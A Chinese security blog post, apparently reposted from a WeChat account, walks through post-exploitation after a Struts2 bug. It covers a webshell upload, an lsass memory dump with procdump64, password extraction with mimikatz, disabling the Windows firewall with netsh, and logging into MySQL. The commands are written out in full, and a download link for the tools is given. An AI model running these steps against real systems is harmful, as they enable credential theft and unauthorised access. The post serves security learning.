初识内网一

admin 2022年10月5日22:56:20评论31 views字数 988阅读3分17秒阅读模式

平时挖SRC的时候,大多时候都是找的webAPP、小程序的漏洞,一般都是到get shell就打住不挖了,今天正好遇到一个struts2就开始简单认识一下内网。

首先执行命令进行信息搜集whoaminetstat -anosysteminfo

初识内网一

初识内网一

初识内网一

得到的信息为服务器是64位的Windows Server 2008并且开启了rdp、mysql服务

然后传个冰蝎的shell

初识内网一

Get shell

初识内网一

对方服务器开启了rdp服务,使用mimikatz抓取对方服务器账号密码实现远程登录

使用procdump64+mimikatz可实现从内存中获取明文密码

procdump64+mimikatz工具

链接:https://pan.baidu.com/s/1eBJ5z8iSe5XlWE6zayG75g提取码:vth3

下载成功解压即可,首先上传procdump64,右键上传即可,我直接上传到C盘的根目录了

初识内网一

然后执行命令

C:procdump64.exe -accepteula -ma lsass.exe lsass.dmp

初识内网一

文件lsass.dmp的路径在红色的框中把它右键下载到本地即可,然后放到目录mimikatz_trunk

初识内网一

然后在本地使用mimikatz.exe读取此文件得到账号密码命令如下

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords fullexitsekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full

初识内网一

尝试登录失败了,应该是防火墙的问题,使用命令关闭掉防火墙

关闭防火墙:netsh advfirewall set allprofiles state off打开防火墙:netsh advfirewall set allprofiles state on

再次登录,登录成功

初识内网一

转战数据库

通过shell翻翻文件有没有mysql的账号密码

在文件user.MYD里面翻到了账号,密码加密了,使用mysql5进行解密成功

初识内网一

初识内网一

因为开始通过端口扫描我扫到的mysql端口是50006所以按照这个端口连接的时候一直失败,最后往上翻了翻开始的搜集的信息

初识内网一

构造命令 连接成功

mysql://root:[email protected]:3306/mysql

初识内网一


原文始发于微信公众号(赛瑞攻防实验室):初识内网一

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日22:56:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   初识内网一http://cn-sec.com/archives/886752.html

发表评论

匿名网友 填写信息